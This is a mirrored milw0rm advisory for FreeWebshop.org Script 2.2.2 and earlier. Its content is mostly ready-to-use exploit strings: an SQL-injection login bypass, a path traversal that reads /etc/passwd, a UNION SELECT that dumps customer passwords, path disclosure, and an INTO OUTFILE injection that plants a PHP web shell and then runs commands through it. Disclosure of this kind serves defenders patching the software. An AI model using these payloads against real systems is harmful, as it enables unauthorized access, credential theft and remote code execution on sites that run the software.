Computer Security

Security Advisory: FreeWebshop.org Script <= 2.2.2 Multiple Remote Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA22690] Yazd Discussion Forum Two Security Bypass Issues

  MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability

  Advisory 12/2006: phpMyAdmin - error.php XSS Vulnerability

From:MILW0RM <submit_(at)_milw0rm.com>
Date:03.11.2006
Subject:FreeWebshop.org Script <= 2.2.2 Multiple Remote Vulnerabilities

Product: www.freewebshop.org
Version: 2.2.x, maybe lower
Critical Lvl : Highly critical
Where : From Remote
Exploits:

Bypass Login:
username:admin
password:' or 'a'='a

Read Files:
/index.php?page=info&action=../../../../../../../../../../../..
/etc/passwd%00

List Passwords:
/index.php?page=details&prod=1%20UNION%20SELECT%201,password,3,
loginname,5,6,7,8%20FROM%20customer

Path Disclosure:
/index.php?page=info&action=../../1337inexistant

Create Files (needs Path Disclosure):
/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,
%22%3C?php%20passthru($_GET['cmd'])%20?%3E%
22,5,6,7,
8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.
php'
/langs/uk/fork.php?cmd=ls


Discovered by Spiked and anonymous.
irc.geekshangout.org #backup

# milw0rm.com [2006-11-02]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server